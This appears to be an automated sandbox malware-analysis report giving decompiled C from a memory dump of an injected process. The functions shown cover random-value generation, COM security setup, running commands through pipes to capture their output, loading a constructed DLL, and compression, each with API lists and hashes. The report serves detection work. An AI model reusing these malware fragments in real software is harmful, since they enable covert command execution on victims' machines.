                  • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                  • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E000916B8(signed int* _a4) {
                  				char _v8;
                  				_Unknown_base(*)()* _v12;
                  				_Unknown_base(*)()* _v16;
                  				char _v20;
                  				_Unknown_base(*)()* _t16;
                  				_Unknown_base(*)()* _t17;
                  				void* _t22;
                  				intOrPtr* _t28;
                  				signed int _t29;
                  				signed int _t30;
                  				struct HINSTANCE__* _t32;
                  				void* _t34;
                  
                  				_t30 = 0;
                  				_v8 = 0;
                  				_t32 = GetModuleHandleA("advapi32.dll");
                  				if(_t32 == 0) {
                  					L9:
                  					return 1;
                  				}
                  				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                  				_v12 = _t16;
                  				if(_t16 == 0) {
                  					goto L9;
                  				}
                  				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                  				_v16 = _t17;
                  				if(_t17 == 0) {
                  					goto L9;
                  				}
                  				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                  				if(_t28 == 0) {
                  					goto L9;
                  				}
                  				_push(0xf0000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push( &_v8);
                  				if(_v12() == 0) {
                  					goto L9;
                  				}
                  				_t22 = _v16(_v8, 4,  &_v20);
                  				 *_t28(_v8, 0);
                  				if(_t22 == 0) {
                  					goto L9;
                  				}
                  				_t29 = 0;
                  				do {
                  					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                  					_t29 = _t29 + 1;
                  				} while (_t29 < 4);
                  				 *_a4 = _t30;
                  				return 0;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                  • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                  • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                  				signed int _t12;
                  				signed int _t13;
                  				int _t15;
                  				char* _t24;
                  				char* _t26;
                  				char* _t28;
                  				char* _t29;
                  				signed int _t40;
                  				char* _t43;
                  				char* _t45;
                  				long long* _t47;
                  
                  				_t12 = _a20;
                  				if(_t12 == 0) {
                  					_t12 = 0x11;
                  				}
                  				_t26 = _a4;
                  				_push(_t30);
                  				 *_t47 = _a12;
                  				_push(_t12);
                  				_push("%.*g");
                  				_push(_a8);
                  				_push(_t26);
                  				L00092285();
                  				_t40 = _t12;
                  				if(_t40 < 0 || _t40 >= _a8) {
                  					L19:
                  					_t13 = _t12 | 0xffffffff;
                  					goto L20;
                  				} else {
                  					L000922CD();
                  					_t15 =  *((intOrPtr*)( *_t12));
                  					if(_t15 != 0x2e) {
                  						_t24 = strchr(_t26, _t15);
                  						if(_t24 != 0) {
                  							 *_t24 = 0x2e;
                  						}
                  					}
                  					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                  						L11:
                  						_t43 = strchr(_t26, 0x65);
                  						_t28 = _t43;
                  						if(_t43 == 0) {
                  							L18:
                  							_t13 = _t40;
                  							L20:
                  							return _t13;
                  						}
                  						_t45 = _t43 + 1;
                  						_t29 = _t28 + 2;
                  						if( *_t45 == 0x2d) {
                  							_t45 = _t29;
                  						}
                  						while( *_t29 == 0x30) {
                  							_t29 = _t29 + 1;
                  						}
                  						if(_t29 != _t45) {
                  							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                  							_t40 = _t40 + _t45 - _t29;
                  						}
                  						goto L18;
                  					} else {
                  						_t6 = _t40 + 3; // 0x909b2
                  						_t12 = _t6;
                  						if(_t12 >= _a8) {
                  							goto L19;
                  						}
                  						_t26[_t40] = 0x302e;
                  						( &(_t26[2]))[_t40] = 0;
                  						_t40 = _t40 + 2;
                  						goto L11;
                  					}
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                  • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                  • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                  • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                  • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                  • SysAllocString.OLEAUT32(?), ref: 0008D764
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                  • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                  • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                  • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                  • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                  • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                  • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E0008D523(void* __ecx) {
                  				char _v8;
                  				void* _v12;
                  				char* _t15;
                  				intOrPtr* _t16;
                  				void* _t21;
                  				intOrPtr* _t23;
                  				intOrPtr* _t24;
                  				intOrPtr* _t25;
                  				void* _t30;
                  				void* _t33;
                  
                  				_v12 = 0;
                  				_v8 = 0;
                  				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                  				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                  				_t15 =  &_v12;
                  				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                  				if(_t15 < 0) {
                  					L5:
                  					_t23 = _v8;
                  					if(_t23 != 0) {
                  						 *((intOrPtr*)( *_t23 + 8))(_t23);
                  					}
                  					_t24 = _v12;
                  					if(_t24 != 0) {
                  						 *((intOrPtr*)( *_t24 + 8))(_t24);
                  					}
                  					_t16 = 0;
                  				} else {
                  					__imp__#2(__ecx);
                  					_t25 = _v12;
                  					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                  					if(_t21 < 0) {
                  						goto L5;
                  					} else {
                  						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                  						if(_t21 < 0) {
                  							goto L5;
                  						} else {
                  							_t16 = E00088604(8);
                  							if(_t16 == 0) {
                  								goto L5;
                  							} else {
                  								 *((intOrPtr*)(_t16 + 4)) = _v12;
                  								 *_t16 = _v8;
                  							}
                  						}
                  					}
                  				}
                  				return _t16;
                  			}

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 10b5e74f8a59f27958c0d6474d468863946cdabe288dbe1f51fb48886bb044ac
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
                  				char* _v8;
                  				long long _v16;
                  				char* _t9;
                  				signed char _t11;
                  				char** _t19;
                  				char _t22;
                  				long long _t32;
                  				long long _t33;
                  
                  				_t9 = __eax;
                  				L000922CD();
                  				_t19 = _a4;
                  				_t22 =  *__eax;
                  				if( *_t22 != 0x2e) {
                  					_t9 = strchr( *_t19, 0x2e);
                  					if(_t9 != 0) {
                  						 *_t9 =  *_t22;
                  					}
                  				}
                  				L00092291();
                  				 *_t9 =  *_t9 & 0x00000000;
                  				_t11 = strtod( *_t19,  &_v8);
                  				asm("fst qword [ebp-0xc]");
                  				_t32 =  *0x98250;
                  				asm("fucomp st1");
                  				asm("fnstsw ax");
                  				if((_t11 & 0x00000044) != 0) {
                  					L5:
                  					st0 = _t32;
                  					L00092291();
                  					if( *_t11 != 0x22) {
                  						_t33 = _v16;
                  						goto L8;
                  					} else {
                  						return _t11 | 0xffffffff;
                  					}
                  				} else {
                  					_t33 =  *0x98258;
                  					asm("fucomp st1");
                  					asm("fnstsw ax");
                  					if((_t11 & 0x00000044) != 0) {
                  						L8:
                  						 *_a8 = _t33;
                  						return 0;
                  					} else {
                  						goto L5;
                  					}
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				signed int _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				struct _SECURITY_ATTRIBUTES _v48;
                  				intOrPtr _v60;
                  				char _v64;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* _v84;
                  				short _v92;
                  				intOrPtr _v96;
                  				void _v140;
                  				intOrPtr _t77;
                  				void* _t79;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				intOrPtr _t92;
                  				intOrPtr _t98;
                  				intOrPtr _t100;
                  				intOrPtr _t102;
                  				long _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t126;
                  				void* _t127;
                  				void* _t128;
                  				void* _t129;
                  				void* _t130;
                  
                  				_t111 = 0;
                  				_v24 = __ecx;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_t127 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				_v48.nLength = 0xc;
                  				_v48.lpSecurityDescriptor = 0;
                  				_v48.bInheritHandle = 1;
                  				_v28 = 0;
                  				memset( &_v140, 0, 0x44);
                  				asm("stosd");
                  				_t130 = _t129 + 0xc;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                  					L18:
                  					return 0;
                  				}
                  				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                  					L13:
                  					E0008861A( &_v28, 0);
                  					if(_v20 != 0) {
                  						_t77 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                  					}
                  					if(_v8 != 0) {
                  						_t115 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                  					}
                  					return _t111;
                  				}
                  				_t79 = _v16;
                  				_v76 = _t79;
                  				_v80 = _t79;
                  				_v84 = _v12;
                  				_v140 = 0x44;
                  				_v96 = 0x101;
                  				_v92 = 0;
                  				_t126 = E00088604(0x1001);
                  				_v28 = _t126;
                  				if(_t126 == 0) {
                  					goto L18;
                  				}
                  				_push( &_v64);
                  				_push( &_v140);
                  				_t85 =  *0x9e684; // 0xe7f8f0
                  				_push(0);
                  				_push(0);
                  				_push(0x8000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push(_v24);
                  				_push(0);
                  				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                  					goto L13;
                  				}
                  				_t87 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                  				_t89 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                  				_v24 = _v24 & 0;
                  				do {
                  					_t92 =  *0x9e684; // 0xe7f8f0
                  					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                  					 *((char*)(_v24 + _t126)) = 0;
                  					if(_t111 == 0) {
                  						_t127 = E000891A6(_t126, 0);
                  					} else {
                  						_push(0);
                  						_push(_t126);
                  						_v32 = _t127;
                  						_t127 = E00089292(_t127);
                  						E0008861A( &_v32, 0xffffffff);
                  						_t130 = _t130 + 0x14;
                  					}
                  					_t111 = _t127;
                  					_v32 = _t127;
                  				} while (_v36 != 0);
                  				_push( &_v36);
                  				_push(E0008C379(_t127));
                  				_t98 =  *0x9e68c; // 0xe7fab8
                  				_push(_t127);
                  				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                  					L12:
                  					_t100 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                  					_t102 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                  					goto L13;
                  				}
                  				_t128 = E00089256(_t127);
                  				if(_t128 == 0) {
                  					goto L12;
                  				}
                  				E0008861A( &_v32, 0);
                  				return _t128;
                  			}

                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 661905bd22fed7a973dcdcef03fb869a0e46d236f1e93c021d7ceb0a470df47b
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 661905bd22fed7a973dcdcef03fb869a0e46d236f1e93c021d7ceb0a470df47b
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				void _v140;
                  				signed char _t14;
                  				char _t15;
                  				intOrPtr _t20;
                  				void* _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t32;
                  				WCHAR* _t34;
                  				intOrPtr _t35;
                  				struct HINSTANCE__* _t37;
                  				int _t38;
                  				intOrPtr _t46;
                  				void* _t47;
                  				intOrPtr _t50;
                  				void* _t60;
                  				void* _t61;
                  				char _t62;
                  				char* _t63;
                  				void* _t65;
                  				intOrPtr _t66;
                  				char _t68;
                  
                  				_t65 = __esi;
                  				_t61 = __edi;
                  				_t47 = __ebx;
                  				_t50 =  *0x9e688; // 0xb0000
                  				_t14 =  *(_t50 + 0x1898);
                  				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                  					_t15 = E000895E1(_t50, 0xb62);
                  					_t66 =  *0x9e688; // 0xb0000
                  					_t62 = _t15;
                  					_t67 = _t66 + 0xb0;
                  					_v8 = _t62;
                  					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                  					_t20 =  *0x9e688; // 0xb0000
                  					asm("sbb eax, eax");
                  					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                  					_t63 = "\\";
                  					_t26 =  *0x9e688; // 0xb0000
                  					_t68 = E000892E5(_t26 + 0x1020);
                  					_v12 = _t68;
                  					E000885D5( &_v8);
                  					_t32 =  *0x9e688; // 0xb0000
                  					_t34 = E000892E5(_t32 + 0x122a);
                  					 *0x9e784 = _t34;
                  					_t35 =  *0x9e684; // 0xe7f8f0
                  					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                  					_t37 = LoadLibraryW( *0x9e784);
                  					 *0x9e77c = _t37;
                  					if(_t37 == 0) {
                  						_t38 = 0;
                  					} else {
                  						_push(_t37);
                  						_t60 = 0x28;
                  						_t38 = E0008E171(0x9bb48, _t60);
                  					}
                  					 *0x9e780 = _t38;
                  					E0008861A( &_v12, 0xfffffffe);
                  					memset( &_v140, 0, 0x80);
                  					if( *0x9e780 != 0) {
                  						goto L10;
                  					} else {
                  						E0008861A(0x9e784, 0xfffffffe);
                  						goto L8;
                  					}
                  				} else {
                  					L8:
                  					if( *0x9e780 == 0) {
                  						_t46 =  *0x9e6bc; // 0xe7fa18
                  						 *0x9e780 = _t46;
                  					}
                  					L10:
                  					return 1;
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: f0f85180af92f8b6e6423e006c9d25780382a4acb783e1dccfe4a16f4333fee2
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: f0f85180af92f8b6e6423e006c9d25780382a4acb783e1dccfe4a16f4333fee2
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
                  				int _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void* __esi;
                  				void* _t137;
                  				signed int _t141;
                  				intOrPtr* _t142;
                  				signed int _t145;
                  				signed int _t146;
                  				intOrPtr _t151;
                  				intOrPtr _t161;
                  				intOrPtr _t162;
                  				intOrPtr _t167;
                  				intOrPtr _t170;
                  				signed int _t172;
                  				intOrPtr _t173;
                  				int _t184;
                  				intOrPtr _t185;
                  				intOrPtr _t188;
                  				signed int _t189;
                  				void* _t195;
                  				int _t202;
                  				int _t208;
                  				intOrPtr _t217;
                  				signed int _t218;
                  				int _t219;
                  				intOrPtr _t220;
                  				signed int _t221;
                  				signed int _t222;
                  				int _t224;
                  				int _t225;
                  				signed int _t227;
                  				intOrPtr _t228;
                  				int _t232;
                  				int _t234;
                  				signed int _t235;
                  				int _t239;
                  				void* _t240;
                  				int _t245;
                  				int _t252;
                  				signed int _t253;
                  				int _t254;
                  				void* _t257;
                  				void* _t258;
                  				int _t259;
                  				intOrPtr _t260;
                  				int _t261;
                  				signed int _t269;
                  				signed int _t271;
                  				intOrPtr* _t272;
                  				void* _t273;
                  
                  				_t253 = _a8;
                  				_t272 = _a4;
                  				_t3 = _t272 + 0xc; // 0x452bf84d
                  				_t4 = _t272 + 0x2c; // 0x8df075ff
                  				_t228 =  *_t4;
                  				_t137 =  *_t3 + 0xfffffffb;
                  				_t229 =  <=  ? _t137 : _t228;
                  				_v16 =  <=  ? _t137 : _t228;
                  				_t269 = 0;
                  				_a4 =  *((intOrPtr*)( *_t272 + 4));
                  				asm("o16 nop [eax+eax]");
                  				while(1) {
                  					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                  					_t141 =  *_t8 + 0x2a >> 3;
                  					_v12 = 0xffff;
                  					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                  					if(_t217 < _t141) {
                  						break;
                  					}
                  					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t12 = _t272 + 0x5c; // 0x84e85000
                  					_t245 =  *_t11 -  *_t12;
                  					_v8 = _t245;
                  					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                  					_t247 =  <  ? _t195 : _v12;
                  					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                  					if(_t227 >= _v16) {
                  						L7:
                  						if(_t253 != 4) {
                  							L10:
                  							_t269 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t285 = _t227 - _t195;
                  							if(_t227 != _t195) {
                  								goto L10;
                  							} else {
                  								_t269 = _t253 - 3;
                  							}
                  						}
                  						E00095D90(_t272, _t272, 0, 0, _t269);
                  						_t18 = _t272 + 0x14; // 0xc703f045
                  						_t19 = _t272 + 8; // 0x8d000040
                  						 *( *_t18 +  *_t19 - 4) = _t227;
                  						_t22 = _t272 + 0x14; // 0xc703f045
                  						_t23 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                  						_t26 = _t272 + 0x14; // 0xc703f045
                  						_t27 = _t272 + 8; // 0x8d000040
                  						 *( *_t26 +  *_t27 - 2) =  !_t227;
                  						_t30 = _t272 + 0x14; // 0xc703f045
                  						_t31 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                  						E00094AF0(_t285,  *_t272);
                  						_t202 = _v8;
                  						_t273 = _t273 + 0x14;
                  						if(_t202 != 0) {
                  							_t208 =  >  ? _t227 : _t202;
                  							_v8 = _t208;
                  							_t36 = _t272 + 0x38; // 0xf47d8bff
                  							_t37 = _t272 + 0x5c; // 0x84e85000
                  							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                  							_t273 = _t273 + 0xc;
                  							_t252 = _v8;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                  							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                  							_t227 = _t227 - _t252;
                  						}
                  						if(_t227 != 0) {
                  							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                  							_t273 = _t273 + 0xc;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                  						}
                  						_t253 = _a8;
                  						if(_t269 == 0) {
                  							continue;
                  						}
                  					} else {
                  						if(_t227 != 0 || _t253 == 4) {
                  							if(_t253 != 0 && _t227 == _t195) {
                  								goto L7;
                  							}
                  						}
                  					}
                  					break;
                  				}
                  				_t142 =  *_t272;
                  				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                  				_a4 = _t232;
                  				if(_t232 == 0) {
                  					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t254 =  *_t83;
                  				} else {
                  					_t59 = _t272 + 0x2c; // 0x8df075ff
                  					_t224 =  *_t59;
                  					if(_t232 < _t224) {
                  						_t65 = _t272 + 0x3c; // 0x830cc483
                  						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t260 =  *_t66;
                  						__eflags =  *_t65 - _t260 - _t232;
                  						if( *_t65 - _t260 <= _t232) {
                  							_t67 = _t272 + 0x38; // 0xf47d8bff
                  							_t261 = _t260 - _t224;
                  							 *(_t272 + 0x6c) = _t261;
                  							memcpy( *_t67,  *_t67 + _t224, _t261);
                  							_t70 = _t272 + 0x16b0; // 0xdf750008
                  							_t188 =  *_t70;
                  							_t273 = _t273 + 0xc;
                  							_t232 = _a4;
                  							__eflags = _t188 - 2;
                  							if(_t188 < 2) {
                  								_t189 = _t188 + 1;
                  								__eflags = _t189;
                  								 *(_t272 + 0x16b0) = _t189;
                  							}
                  						}
                  						_t73 = _t272 + 0x38; // 0xf47d8bff
                  						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                  						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                  						_t225 = _a4;
                  						_t273 = _t273 + 0xc;
